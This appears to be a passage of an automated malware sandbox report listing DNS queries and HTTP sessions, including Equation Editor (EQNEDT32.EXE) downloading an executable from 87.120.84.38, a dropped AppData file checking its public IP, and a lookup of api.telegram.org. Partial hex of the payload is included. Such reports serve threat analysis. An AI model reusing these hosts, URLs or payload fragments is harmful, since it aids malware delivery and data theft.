                                                                                                          Oct 30, 2024 08:14:28.640479088 CET8.8.8.8192.168.2.220x5f5cNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:28.640479088 CET8.8.8.8192.168.2.220x5f5cNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:31.516596079 CET8.8.8.8192.168.2.220x3899No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:31.516596079 CET8.8.8.8192.168.2.220x3899No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:31.516596079 CET8.8.8.8192.168.2.220x3899No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:31.516596079 CET8.8.8.8192.168.2.220x3899No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:31.516596079 CET8.8.8.8192.168.2.220x3899No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:31.516596079 CET8.8.8.8192.168.2.220x3899No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:31.526447058 CET8.8.8.8192.168.2.220xad78No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:31.526447058 CET8.8.8.8192.168.2.220xad78No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:31.526447058 CET8.8.8.8192.168.2.220xad78No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:31.526447058 CET8.8.8.8192.168.2.220xad78No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:31.526447058 CET8.8.8.8192.168.2.220xad78No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:31.526447058 CET8.8.8.8192.168.2.220xad78No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:32.392698050 CET8.8.8.8192.168.2.220x80b8No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:32.392698050 CET8.8.8.8192.168.2.220x80b8No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:33.191813946 CET8.8.8.8192.168.2.220x3660No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:33.191813946 CET8.8.8.8192.168.2.220x3660No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:33.191813946 CET8.8.8.8192.168.2.220x3660No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:33.191813946 CET8.8.8.8192.168.2.220x3660No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:33.191813946 CET8.8.8.8192.168.2.220x3660No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:33.191813946 CET8.8.8.8192.168.2.220x3660No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:33.201894999 CET8.8.8.8192.168.2.220xb91eNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:33.201894999 CET8.8.8.8192.168.2.220xb91eNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:33.201894999 CET8.8.8.8192.168.2.220xb91eNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:33.201894999 CET8.8.8.8192.168.2.220xb91eNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:33.201894999 CET8.8.8.8192.168.2.220xb91eNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:33.201894999 CET8.8.8.8192.168.2.220xb91eNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:34.079013109 CET8.8.8.8192.168.2.220x14baNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:34.079013109 CET8.8.8.8192.168.2.220x14baNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:34.892066956 CET8.8.8.8192.168.2.220x1d7fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:34.892066956 CET8.8.8.8192.168.2.220x1d7fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:34.892066956 CET8.8.8.8192.168.2.220x1d7fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:34.892066956 CET8.8.8.8192.168.2.220x1d7fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:34.892066956 CET8.8.8.8192.168.2.220x1d7fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:34.892066956 CET8.8.8.8192.168.2.220x1d7fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:34.911276102 CET8.8.8.8192.168.2.220xd29dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:34.911276102 CET8.8.8.8192.168.2.220xd29dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:34.911276102 CET8.8.8.8192.168.2.220xd29dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:34.911276102 CET8.8.8.8192.168.2.220xd29dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:34.911276102 CET8.8.8.8192.168.2.220xd29dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:34.911276102 CET8.8.8.8192.168.2.220xd29dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:35.866677046 CET8.8.8.8192.168.2.220xfd48No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:35.866677046 CET8.8.8.8192.168.2.220xfd48No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:35.877414942 CET8.8.8.8192.168.2.220xfd48No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:35.877414942 CET8.8.8.8192.168.2.220xfd48No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:36.763480902 CET8.8.8.8192.168.2.220x9f57No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:36.763480902 CET8.8.8.8192.168.2.220x9f57No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:36.763480902 CET8.8.8.8192.168.2.220x9f57No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:36.763480902 CET8.8.8.8192.168.2.220x9f57No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:36.763480902 CET8.8.8.8192.168.2.220x9f57No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:36.763480902 CET8.8.8.8192.168.2.220x9f57No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:36.775176048 CET8.8.8.8192.168.2.220xd004No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:36.775176048 CET8.8.8.8192.168.2.220xd004No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:36.775176048 CET8.8.8.8192.168.2.220xd004No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:36.775176048 CET8.8.8.8192.168.2.220xd004No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:36.775176048 CET8.8.8.8192.168.2.220xd004No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:36.775176048 CET8.8.8.8192.168.2.220xd004No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:37.650641918 CET8.8.8.8192.168.2.220x6d95No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:37.650641918 CET8.8.8.8192.168.2.220x6d95No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:38.442672014 CET8.8.8.8192.168.2.220xd357No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:38.442672014 CET8.8.8.8192.168.2.220xd357No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:38.442672014 CET8.8.8.8192.168.2.220xd357No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:38.442672014 CET8.8.8.8192.168.2.220xd357No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:38.442672014 CET8.8.8.8192.168.2.220xd357No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:38.442672014 CET8.8.8.8192.168.2.220xd357No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:38.452097893 CET8.8.8.8192.168.2.220xf50eNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:38.452097893 CET8.8.8.8192.168.2.220xf50eNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:38.452097893 CET8.8.8.8192.168.2.220xf50eNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:38.452097893 CET8.8.8.8192.168.2.220xf50eNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:38.452097893 CET8.8.8.8192.168.2.220xf50eNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:38.452097893 CET8.8.8.8192.168.2.220xf50eNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:39.340241909 CET8.8.8.8192.168.2.220xaf99No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:39.340241909 CET8.8.8.8192.168.2.220xaf99No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:40.137716055 CET8.8.8.8192.168.2.220xb1fbNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:40.137716055 CET8.8.8.8192.168.2.220xb1fbNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:40.137716055 CET8.8.8.8192.168.2.220xb1fbNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:40.137716055 CET8.8.8.8192.168.2.220xb1fbNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:40.137716055 CET8.8.8.8192.168.2.220xb1fbNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:40.137716055 CET8.8.8.8192.168.2.220xb1fbNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:40.147984028 CET8.8.8.8192.168.2.220xd5a2No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:40.147984028 CET8.8.8.8192.168.2.220xd5a2No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:40.147984028 CET8.8.8.8192.168.2.220xd5a2No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:40.147984028 CET8.8.8.8192.168.2.220xd5a2No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:40.147984028 CET8.8.8.8192.168.2.220xd5a2No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:40.147984028 CET8.8.8.8192.168.2.220xd5a2No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:41.056991100 CET8.8.8.8192.168.2.220xfc34No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:41.056991100 CET8.8.8.8192.168.2.220xfc34No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:42.787427902 CET8.8.8.8192.168.2.220x4a07No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:42.787427902 CET8.8.8.8192.168.2.220x4a07No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:42.787427902 CET8.8.8.8192.168.2.220x4a07No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:42.787427902 CET8.8.8.8192.168.2.220x4a07No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:42.787427902 CET8.8.8.8192.168.2.220x4a07No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:42.787427902 CET8.8.8.8192.168.2.220x4a07No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:42.796737909 CET8.8.8.8192.168.2.220x7003No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:42.796737909 CET8.8.8.8192.168.2.220x7003No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:42.796737909 CET8.8.8.8192.168.2.220x7003No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:42.796737909 CET8.8.8.8192.168.2.220x7003No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:42.796737909 CET8.8.8.8192.168.2.220x7003No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:42.796737909 CET8.8.8.8192.168.2.220x7003No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:43.744806051 CET8.8.8.8192.168.2.220xcf3No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:43.744806051 CET8.8.8.8192.168.2.220xcf3No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:14:44.524665117 CET8.8.8.8192.168.2.220xa02eNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • reallyfreegeoip.org
                                                                                                          • api.telegram.org
                                                                                                          • 87.120.84.38
                                                                                                          • checkip.dyndns.org

                                                                                                          HTTP Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.224916587.120.84.38803308C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:14:17.704850912 CET322OUTGET /txt/CLLPdgxhnmwGf5Y.exe HTTP/1.1
                                                                                                          Accept: */*
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                          Host: 87.120.84.38
                                                                                                          Connection: Keep-Alive
                                                                                                          Oct 30, 2024 08:14:18.649243116 CET1236INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.26.2
                                                                                                          Date: Wed, 30 Oct 2024 07:14:18 GMT
                                                                                                          Content-Type: application/x-msdos-program
                                                                                                          Content-Length: 756736
                                                                                                          Connection: keep-alive
                                                                                                          Last-Modified: Wed, 30 Oct 2024 02:10:57 GMT
                                                                                                          ETag: "b8c00-625a8366620d3"
                                                                                                          Accept-Ranges: bytes
                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ec 94 21 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 70 0b 00 00 1a 00 00 00 00 00 00 a2 8f 0b 00 00 20 00 00 00 a0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 8f 0b 00 4f 00 00 00 00 a0 0b 00 20 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL!g0p @ @PO H.texto p `.rsrc r@@.reloc@BHqg0((+*0((+*0((+*0((+*0((+*0((+*0((+*0((+*0((+*0(( +*0
                                                                                                          Oct 30, 2024 08:14:18.649269104 CET1236INData Raw: 00 00 01 00 00 11 00 02 80 01 00 00 04 28 18 00 00 06 00 02 03 04 05 0e 04 0e 05 28 21 00 00 0a 0a 2b 00 06 2a 00 13 30 07 00 21 00 00 00 01 00 00 11 00 02 80 01 00 00 04 28 18 00 00 06 00 02 03 04 05 0e 04 0e 05 0e 06 28 22 00 00 0a 0a 2b 00 06
                                                                                                          Data Ascii: ((!+*0!(("+*vs~#*0J~~#($,rps%z~,~~#(&(*0},~(+a
                                                                                                          Oct 30, 2024 08:14:18.649280071 CET1236INData Raw: 00 0a 6f 4b 00 00 0a 00 02 7b 06 00 00 04 28 01 00 00 2b 02 fe 06 2e 00 00 06 73 4d 00 00 0a 6f 4e 00 00 0a 00 02 7b 14 00 00 04 03 6f 39 00 00 0a 00 02 7b 11 00 00 04 17 6f 48 00 00 0a 00 2a 00 00 13 30 03 00 48 00 00 00 08 00 00 11 00 02 7b 15
                                                                                                          Data Ascii: oK{(+.sMoN{o9{oH*0H{oOoP,-{oOoQoRoSoT}+*0P{oJoU{oJ(+~p%-&~osW%p(+(+oZ
                                                                                                          Oct 30, 2024 08:14:18.649430037 CET1236INData Raw: 00 00 0a 72 b5 01 00 70 6f 6d 00 00 0a 6f 6e 00 00 0a 28 62 00 00 0a 13 08 11 08 39 9c 00 00 00 00 11 06 6f 6c 00 00 0a 72 b5 01 00 70 6f 6d 00 00 0a 6f 6e 00 00 0a 13 09 11 06 6f 6c 00 00 0a 72 bf 01 00 70 6f 6d 00 00 0a 6f 6e 00 00 0a 13 0a 72
                                                                                                          Data Ascii: rpomon(b9olrpomonolrpomonrpso`%rQp%%rWp%%r]p(eolrpomopoqor%/os:u4,ot+*
                                                                                                          Oct 30, 2024 08:14:18.649441004 CET1236INData Raw: 00 02 7b 0d 00 00 04 1e 1e 1e 1e 73 83 00 00 0a 6f 84 00 00 0a 00 02 7b 0d 00 00 04 72 e9 02 00 70 6f 85 00 00 0a 00 02 7b 0d 00 00 04 1f 6d 1f 24 73 86 00 00 0a 6f 87 00 00 0a 00 02 7b 0d 00 00 04 1b 6f 88 00 00 0a 00 02 7b 0d 00 00 04 72 fd 02
                                                                                                          Data Ascii: {so{rpo{m$so{o{rpo9{o{o{+so{ Os/o{so{rpo{ "so{o
                                                                                                          Oct 30, 2024 08:14:18.649451017 CET1236INData Raw: 20 14 04 00 00 73 2f 00 00 0a 6f 82 00 00 0a 00 02 7b 16 00 00 04 1e 1e 1e 1e 73 83 00 00 0a 6f 84 00 00 0a 00 02 7b 16 00 00 04 17 6f 9c 00 00 0a 00 02 7b 16 00 00 04 72 ed 03 00 70 6f 85 00 00 0a 00 02 7b 16 00 00 04 19 6f 9d 00 00 0a 00 02 7b
                                                                                                          Data Ascii: s/o{so{o{rpo{o{ w so{o{o{'so{o{M s/o{so{rpo{c
                                                                                                          Oct 30, 2024 08:14:18.649461031 CET1236INData Raw: 02 28 a6 00 00 0a 02 7b 11 00 00 04 6f a7 00 00 0a 00 02 28 a6 00 00 0a 02 7b 10 00 00 04 6f a7 00 00 0a 00 02 28 a6 00 00 0a 02 7b 0f 00 00 04 6f a7 00 00 0a 00 02 28 a6 00 00 0a 02 7b 0e 00 00 04 6f a7 00 00 0a 00 02 28 a6 00 00 0a 02 7b 0d 00
                                                                                                          Data Ascii: ({o({o({o({o({o({o({o({o({o(rpot(s(rp(rpo9 s
                                                                                                          Oct 30, 2024 08:14:18.649631023 CET1236INData Raw: 02 73 7b 00 00 0a 7d 22 00 00 04 02 73 80 00 00 0a 7d 23 00 00 04 02 73 7a 00 00 0a 7d 24 00 00 04 02 7b 1f 00 00 04 6f 81 00 00 0a 00 02 7b 20 00 00 04 6f c8 00 00 0a 00 02 28 81 00 00 0a 00 02 7b 1f 00 00 04 18 6f c9 00 00 0a 00 02 7b 1f 00 00
                                                                                                          Data Ascii: s{}"s}#sz}${o{ o({o{o"Bso&{o"Bso&{o{ o{o{!o{o{"o{o{#o{o
                                                                                                          Oct 30, 2024 08:14:18.649679899 CET1236INData Raw: 00 04 1f 0a 6f dc 00 00 0a 00 02 7b 24 00 00 04 18 6f dd 00 00 0a 00 02 7b 24 00 00 04 20 74 02 00 00 20 cb 02 00 00 73 2f 00 00 0a 6f 82 00 00 0a 00 02 7b 24 00 00 04 1e 1d 1e 1d 73 83 00 00 0a 6f 84 00 00 0a 00 02 7b 24 00 00 04 72 27 06 00 70
                                                                                                          Data Ascii: o{$o{$ t s/o{$so{$r'po{$ 7so{$o{$r9po9{$("A"As(( t 3s(({o(rpo
                                                                                                          Oct 30, 2024 08:14:18.649691105 CET1236INData Raw: 00 11 00 02 7b 2b 00 00 04 0a 2b 00 06 2a 13 30 01 00 0c 00 00 00 13 00 00 11 00 02 7b 2d 00 00 04 0a 2b 00 06 2a 13 30 01 00 0c 00 00 00 13 00 00 11 00 02 7b 2e 00 00 04 0a 2b 00 06 2a 13 30 01 00 0c 00 00 00 13 00 00 11 00 02 7b 2f 00 00 04 0a
                                                                                                          Data Ascii: {++*0{-+*0{.+*0{/+*0{0+*0{1+*0{2+*0{3+*0F(4}4}5}6}7}8}
                                                                                                          Oct 30, 2024 08:14:18.654733896 CET1236INData Raw: 0a 13 0b 09 6f 02 01 00 0a 16 6f 03 01 00 0a 18 6f 04 01 00 0a 6f 3f 00 00 0a 13 0c 09 6f 02 01 00 0a 16 6f 03 01 00 0a 19 6f 04 01 00 0a 6f 3f 00 00 0a 13 0d 09 6f 02 01 00 0a 16 6f 03 01 00 0a 1a 6f 04 01 00 0a 6f 3f 00 00 0a 13 0e 09 6f 02 01
                                                                                                          Data Ascii: oooo?oooo?oooo?oooo?oooo?oooo?oooo?oooo?oooo?ooo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.2249166158.101.44.242803576C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:14:25.751063108 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Oct 30, 2024 08:14:26.415436029 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:14:26 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 9cf04fbbd23d22be0088016088f1a817
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                                                                          Oct 30, 2024 08:14:26.626916885 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:14:26 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 9cf04fbbd23d22be0088016088f1a817
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                                                                          Oct 30, 2024 08:14:28.439865112 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Oct 30, 2024 08:14:28.594269991 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:14:28 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
